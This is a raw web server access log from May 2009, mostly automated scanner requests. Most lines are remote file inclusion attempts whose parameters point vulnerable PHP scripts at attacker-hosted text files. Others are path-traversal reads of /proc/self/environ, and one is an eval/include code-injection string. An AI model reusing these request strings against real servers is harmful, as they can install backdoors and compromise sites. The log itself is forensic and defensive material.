58.227.193.198 - - [23/May/2009:06:34:07 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:06:34:09 -0400] "GET /logs/access_log.Q109030200//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
124.0.54.98 - - [23/May/2009:06:34:10 -0400] "GET //?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
124.0.54.98 - - [23/May/2009:06:34:10 -0400] "GET /logs//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
216.151.134.36 - - [23/May/2009:06:34:30 -0400] "GET /logs/access_log.Q109050300%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:34:30 -0400] "GET /logs/access_log.Q108091400%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
88.84.128.40 - - [23/May/2009:06:37:18 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.191.103.144 - - [23/May/2009:06:37:46 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
209.59.12.99 - - [23/May/2009:06:38:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.67.30.155 - - [23/May/2009:06:40:02 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:40:02 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:40:02 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
65.55.105.236 - - [23/May/2009:06:41:13 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.43.0.140 - - [23/May/2009:06:41:14 -0400] "GET /voir.php?inc=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:06:41:14 -0400] "GET /logs/voir.php?inc=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:06:41:14 -0400] "GET /logs/access_log.Q109050700/voir.php?inc=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
65.55.105.236 - - [23/May/2009:06:41:13 -0400] "GET /images/ACE_EZ_PRP_sellsheet.pdf HTTP/1.1" 200 1064438 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.151.134.36 - - [23/May/2009:06:42:10 -0400] "GET //bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:42:10 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:42:10 -0400] "GET /logs/access_log.Q109042500//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:42:39 -0400] "GET /logs/access_log.Q108122000//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
115.145.170.177 - - [23/May/2009:06:42:55 -0400] "GET //?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
218.185.20.88 - - [23/May/2009:06:43:04 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:05 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:05 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:05 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:05 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:05 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:09 -0400] "GET /logs/access_log.Q109031600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:10 -0400] "GET /logs/access_log.Q109031600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:43:20 -0400] "GET /logs/access_log.Q108091400%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:43:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:06:43:59 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:59 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:59 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:43:59 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:06:44:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081BF401781C7006F9D041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.171 - - [23/May/2009:06:44:02 -0400] "GET /images/Office%20Supply/LCALEN.HTM HTTP/1.0" 200 7957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.151.134.36 - - [23/May/2009:06:44:10 -0400] "GET /logs/access_log.Q109042500%20%20//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:44:11 -0400] "GET /logs/access_log.Q109042500//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:44:11 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:44:11 -0400] "GET //bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:44:16 -0400] "GET /logs/access_log.Q108122000%20%20//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:44:40 -0400] "GET /logs/access_log.Q108122000//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:06:45:00 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:06:45:01 -0400] "GET //?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:06:45:02 -0400] "GET /logs//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
58.227.193.198 - - [23/May/2009:06:45:41 -0400] "GET /logs/error_log.Q109050300%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:45:43 -0400] "GET /logs/access_log.Q108110900/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
77.221.130.12 - - [23/May/2009:06:45:52 -0400] "GET /logs/access_log.Q108091700/atom.php5?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:06:45:52 -0400] "GET /logs/atom.php5?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:06:45:52 -0400] "GET /atom.php5?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:06:45:57 -0400] "GET /logs/error_log.Q108091700/atom.php5?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
219.94.148.39 - - [23/May/2009:06:46:29 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:46:29 -0400] "GET /logs/access_log.Q108110900//agendax/addevent.inc.php?agendax_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:46:29 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:46:34 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:46:34 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:46:34 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:46:40 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:46:40 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:46:40 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:46:45 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:46:45 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:46:45 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:06:46:59 -0400] "GET //snippet.reflect.php?reflect_base=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:06:46:59 -0400] "GET /logs/access_log.Q109012300//snippet.reflect.php?reflect_base=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:06:47:00 -0400] "GET /logs//snippet.reflect.php?reflect_base=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:06:47:02 -0400] "GET /logs/error_log.Q108121100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.227.193.198 - - [23/May/2009:06:47:08 -0400] "GET /logs/access_log.Q108122000%20%20//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:47:08 -0400] "GET /logs/error_log.Q108082600%20%20//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:47:14 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:06:47:50 -0400] "GET /logs/access_log.Q109012300%20%20//snippet.reflect.php?reflect_base=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:48:18 -0400] "GET /logs/access_log.Q108110900%20%20//agendax/addevent.inc.php?agendax_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:06:48:27 -0400] "GET /logs/access_log.Q109050300%20%20//snippet.reflect.php?reflect_base=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:45 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:45 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:45 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:45 -0400] "GET /logs/access_log.Q109031600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:48:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:06:48:47 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:47 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:47 -0400] "GET /logs/access_log.Q108081700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:06:48:50 -0400] "GET /logs/access_log.Q109031600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:49:41 -0400] "GET /logs/access_log.Q108110900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
82.194.87.219 - - [23/May/2009:06:49:43 -0400] "GET /logs//errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
216.151.134.36 - - [23/May/2009:06:50:17 -0400] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:50:17 -0400] "GET /?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:50:17 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:50:18 -0400] "GET /logs/access_log.Q108110900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:50:23 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.60.66 - - [23/May/2009:06:50:26 -0400] "GET /logs/access_log.Q109010400//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://208.98.22.241/id.txt???? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
218.249.60.66 - - [23/May/2009:06:50:26 -0400] "GET /logs/access_log.Q109020100//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://208.98.22.241/id.txt???? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
218.249.60.66 - - [23/May/2009:06:50:29 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://208.98.22.241/id.txt???? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
218.249.60.66 - - [23/May/2009:06:50:29 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://208.98.22.241/id.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
82.194.87.219 - - [23/May/2009:06:50:37 -0400] "GET /logs///errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
219.94.148.39 - - [23/May/2009:06:50:43 -0400] "GET /logs/access_log.Q108053100%20%20//agendax/addevent.inc.php?agendax_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:50:50 -0400] "GET //components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:50:50 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:50:50 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:51:06 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:51:12 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:51:40 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.pinoy.ae/uploads/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.116.102.163 - - [23/May/2009:06:51:46 -0400] "GET /logs/error_log.Q109030300//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
210.116.102.163 - - [23/May/2009:06:51:47 -0400] "GET //?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
210.116.102.163 - - [23/May/2009:06:51:47 -0400] "GET /logs//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
58.227.193.198 - - [23/May/2009:06:52:15 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:52:15 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:52:15 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
115.145.170.177 - - [23/May/2009:06:52:21 -0400] "GET /logs/access_log.Q109050300//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.145.170.177 - - [23/May/2009:06:52:21 -0400] "GET //?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
115.145.170.177 - - [23/May/2009:06:52:22 -0400] "GET /logs//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.805"
216.104.47.218 - - [23/May/2009:06:52:25 -0400] "GET /announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:52:25 -0400] "GET /logs/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:52:25 -0400] "GET /logs/access_log.Q109051200%20%20/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:06:52:39 -0400] "GET /logs/access_log.Q108111400//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
58.227.193.198 - - [23/May/2009:06:52:41 -0400] "GET /?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:52:41 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:52:41 -0400] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:52:48 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:52:52 -0400] "GET /announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:52:52 -0400] "GET /logs/access_log.Q109051200%20%20/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:52:52 -0400] "GET /logs/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:53:20 -0400] "GET /logs/access_log.Q109050900%20%20/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:53:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.151.134.36 - - [23/May/2009:06:53:46 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:06:53:49 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
